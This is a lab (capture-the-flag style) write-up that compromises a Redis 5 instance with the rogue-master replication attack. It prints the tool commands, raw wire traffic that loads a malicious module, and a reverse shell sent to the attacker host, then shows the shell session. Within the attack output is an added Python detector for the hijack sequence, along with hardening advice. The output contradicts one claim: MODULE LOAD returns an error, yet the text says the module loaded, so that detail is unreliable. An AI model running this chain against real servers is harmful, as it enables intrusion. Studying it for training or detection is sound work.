Redis Rogue Server


The target Redis instance runs version 5.0.14. It is tested here for the rogue server attack, which abuses Redis's master/slave replication: the attacker's rogue master is accepted via SLAVEOF, pushes a shared object as the replication payload, which the target writes to disk under the configured dbfilename and then loads with MODULE LOAD.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ git clone https://github.com/n0b0dyCN/redis-rogue-server ; cd redis-rogue-server
Cloning into 'redis-rogue-server'...
remote: Enumerating objects: 87, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 87 (delta 0), reused 1 (delta 0), pack-reused 83 (from 1)
Receiving objects: 100% (87/87), 245.56 KiB | 3.78 MiB/s, done.
Resolving deltas: 100% (19/19), done.

The rogue-server tool is cloned to the Kali host, then run against the target with the known password.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys/redis-rogue-server]
└─$ python3 redis-rogue-server.py --passwd='Ready4Redis?' --rhost=$IP --lhost=$tun0 --lport=6379 -v 
 
  BANNER = """______         _ _      ______                         _____
______         _ _      ______                         _____                          
| ___ \       | (_)     | ___ \                       /  ___|                         
| |_/ /___  __| |_ ___  | |_/ /___   __ _ _   _  ___  \ `--.  ___ _ ____   _____ _ __ 
|    // _ \/ _` | / __| |    // _ \ / _` | | | |/ _ \  `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \  __/ (_| | \__ \ | |\ \ (_) | (_| | |_| |  __/ /\__/ /  __/ |   \ V /  __/ |   
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_|    \_/ \___|_|   
                                     __/ |                                            
                                    |___/                                             
@copyright n0b0dy @ r3kapig
 
[info] TARGET 192.168.154.166:6379
[info] SERVER 192.168.45.218:6379
[info] Setting master...
[info] Authenticating...
[<-] b'*2\r\n$4\r\nAUTH\r\n$12\r\nReady4Redis?\r\n'
[->] b'+OK\r\n'
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$14\r\n192.168.45.218\r\n$4\r\n6379\r\n'
[->] b'+OK\r\n'
[info] Setting dbfilename...
[<-] b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\nexp.so\r\n'
[->] b'+OK\r\n'
[->] b'*1\r\n$4\r\nPING\r\n'
[<-] b'+PONG\r\n'
[->] b'*3\r\n$8\r\nREPLCONF\r\n$14\r\nlistening-port\r\n$4\r\n6379\r\n'
[<-] b'+OK\r\n'
[->] b'*5\r\n$8\r\nREPLCONF\r\n$4\r\ncapa\r\n$3\r\neof\r\n$4\r\ncapa\r\n$6\r\npsync2\r\n'
[<-] b'+OK\r\n'
[->] b'*3\r\n$5\r\nPSYNC\r\n$40\r\n7230e7cfef63ececa327b903ec3ce7eee1f02faf\r\n$1\r\n1\r\n'
[<-] b'+FULLRESYNC ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ 1\r\n$44320\r\n\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00'......b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00J\xa6\x00\x00\x00\x00\x00\x00\xd3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\n'
[info] Loading module...
[<-] b'*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./exp.so\r\n'
[->] b'-ERR Error loading the extension. Please check the server logs.\r\n'
[info] Temerory cleaning up...
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$2\r\nNO\r\n$3\r\nONE\r\n'
[->] b'+OK\r\n'
[<-] b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$8\r\ndump.rdb\r\n'
[->] b'+OK\r\n'
[<-] b'*2\r\n$11\r\nsystem.exec\r\n$11\r\nrm ./exp.so\r\n'
[->] b'$0\r\n\r\n'
What do u want, [i]nteractive shell or [r]everse shell: r
[info] Open reverse shell...
Reverse server address: 192.168.45.218
Reverse server port: 80
[<-] b'*3\r\n$10\r\nsystem.rev\r\n$14\r\n192.168.45.218\r\n$2\r\n80\r\n'
[<-] b'*3\r\n$10\r\nsystem.rev\r\n$14\r\n192.168.45.218\r\n$2\r\n80\r\n'
[info] Reverse shell payload sent.
[info] Check at 192.168.45.218:80
[info] Unload module...
[<-] b'*3\r\n$6\r\nMODULE\r\n$6\r\nUNLOAD\r\n$6\r\nsystem\r\n'

Successfully loaded the exp.so module; spawning a reverse shell via the module's exec method.
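The verbose output above is raw RESP wire traffic, and the same byte sequences are what a defender can watch for. The following Python is an added example written for this page (not part of redis-rogue-server or Redis): it decodes RESP2 values, classifies each client command, and reports when the replication-hijack stages (SLAVEOF to an unapproved host, CONFIG SET dbfilename, MODULE LOAD) occur in order. The allow-list, the TEST-NET attacker address and the sample streams are constructed for the example.

```python
"""Decode Redis RESP traffic and flag the rogue-master (replication hijack)
sequence seen in the write-up. Added example for this page; not code from
redis-rogue-server or from Redis itself."""
from __future__ import annotations

# Constructed allow-list: hosts this replica is permitted to replicate from.
ALLOWED_MASTERS = {"10.0.0.5"}


class RespError(str):
    """A RESP error reply ('-ERR ...'), kept as a str subclass for easy matching."""


def parse_resp_value(data: bytes, pos: int = 0):
    """Parse one RESP2 value starting at `pos`; return (value, next_pos).

    Simple strings -> str, errors -> RespError, integers -> int,
    bulk strings -> bytes (None for the null bulk $-1), arrays -> list.
    """
    kind = data[pos:pos + 1]
    end = data.index(b"\r\n", pos)
    line = data[pos + 1:end]
    nxt = end + 2
    if kind == b"+":
        return line.decode(), nxt
    if kind == b"-":
        return RespError(line.decode()), nxt
    if kind == b":":
        return int(line), nxt
    if kind == b"$":
        length = int(line)
        if length == -1:
            return None, nxt
        body = data[nxt:nxt + length]
        if len(body) != length or data[nxt + length:nxt + length + 2] != b"\r\n":
            raise ValueError(f"truncated bulk string at offset {pos}")
        return body, nxt + length + 2
    if kind == b"*":
        items = []
        for _ in range(int(line)):
            item, nxt = parse_resp_value(data, nxt)
            items.append(item)
        return items, nxt
    raise ValueError(f"unknown RESP type byte {kind!r} at offset {pos}")


def parse_resp_stream(data: bytes) -> list:
    """Parse a byte stream holding several back-to-back RESP values."""
    values, pos = [], 0
    while pos < len(data):
        value, pos = parse_resp_value(data, pos)
        values.append(value)
    return values


def classify_command(cmd) -> str | None:
    """Return a finding string for one client command array, else None."""
    if not isinstance(cmd, list):
        return None
    words = [w.decode("utf-8", "replace") for w in cmd if isinstance(w, bytes)]
    if not words:
        return None
    name = words[0].upper()
    args = [a.upper() for a in words[1:]]
    if name in ("SLAVEOF", "REPLICAOF"):
        if args[:2] == ["NO", "ONE"]:
            return "replication detached (SLAVEOF NO ONE)"
        host = words[1] if len(words) > 1 else "?"
        return None if host in ALLOWED_MASTERS else f"replication redirected to unapproved master {host}"
    if name == "CONFIG" and len(args) >= 2 and args[0] == "SET" and args[1] in ("DBFILENAME", "DIR"):
        return f"persistence path changed: {args[1].lower()}={words[3] if len(words) > 3 else ''}"
    if name == "MODULE" and args[:1] in (["LOAD"], ["LOADEX"]):
        return f"native module load attempted: {words[2] if len(words) > 2 else ''}"
    if "." in name:  # module-provided commands such as system.exec / system.rev
        return f"module command invoked: {words[0]}"
    return None


def scan_client_stream(data: bytes) -> list[str]:
    """Findings for every command in a client->server byte stream."""
    return [f for f in map(classify_command, parse_resp_stream(data)) if f]


def is_rogue_master_sequence(findings: list[str]) -> bool:
    """True when the three hijack stages appear in order; interleaving allowed."""
    stages = ("replication redirected", "persistence path changed", "native module load")
    i = 0
    for f in findings:
        if i < len(stages) and f.startswith(stages[i]):
            i += 1
    return i == len(stages)


# Constructed sample: the client->server half of a session shaped like the
# page's transcript, with a TEST-NET address standing in for the rogue master.
SAMPLE_CLIENT_STREAM = (
    b"*2\r\n$4\r\nAUTH\r\n$8\r\nhunter22\r\n"
    b"*3\r\n$7\r\nSLAVEOF\r\n$10\r\n192.0.2.10\r\n$4\r\n6379\r\n"
    b"*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\nexp.so\r\n"
    b"*2\r\n$3\r\nGET\r\n$7\r\nsession\r\n"
    b"*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./exp.so\r\n"
    b"*3\r\n$7\r\nSLAVEOF\r\n$2\r\nNO\r\n$3\r\nONE\r\n"
    b"*2\r\n$11\r\nsystem.exec\r\n$2\r\nid\r\n"
)
# Constructed server replies in the three shapes that appear on the page.
SAMPLE_SERVER_STREAM = (
    b"+OK\r\n-ERR Error loading the extension. Please check the server logs.\r\n$0\r\n\r\n"
)

if __name__ == "__main__":
    found = scan_client_stream(SAMPLE_CLIENT_STREAM)
    for line in found:
        print("[finding]", line)
    print("rogue-master sequence:", is_rogue_master_sequence(found))
    print("replies:", parse_resp_stream(SAMPLE_SERVER_STREAM))
```

Note that the target already required a password (the AUTH exchange succeeds), so requirepass alone did not prevent this: any client that can authenticate can issue SLAVEOF, CONFIG SET and MODULE LOAD. On Redis 5 the practical controls are to keep the instance off untrusted networks (bind, protected-mode, firewalling), to disable or rename those administrative commands with rename-command, and to run the service as an unprivileged account, which is why the shell obtained here lands as the redis user rather than root.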

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ nnc 80                 
listening on [any] 80 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.154.166] 49410
whoami
redis
hostname
readys
ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.154.166  netmask 255.255.255.0  broadcast 192.168.154.255
        inet6 fe80::250:56ff:fe9e:d748  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:9e:d7:48  txqueuelen 1000  (Ethernet)
        RX packets 2228181  bytes 247342222 (235.8 MiB)
        RX errors 0  dropped 268  overruns 0  frame 0
        TX packets 1477511  bytes 259125132 (247.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 2410  bytes 238538 (232.9 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2410  bytes 238538 (232.9 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial foothold established on the target system as the redis account via the Redis rogue server technique.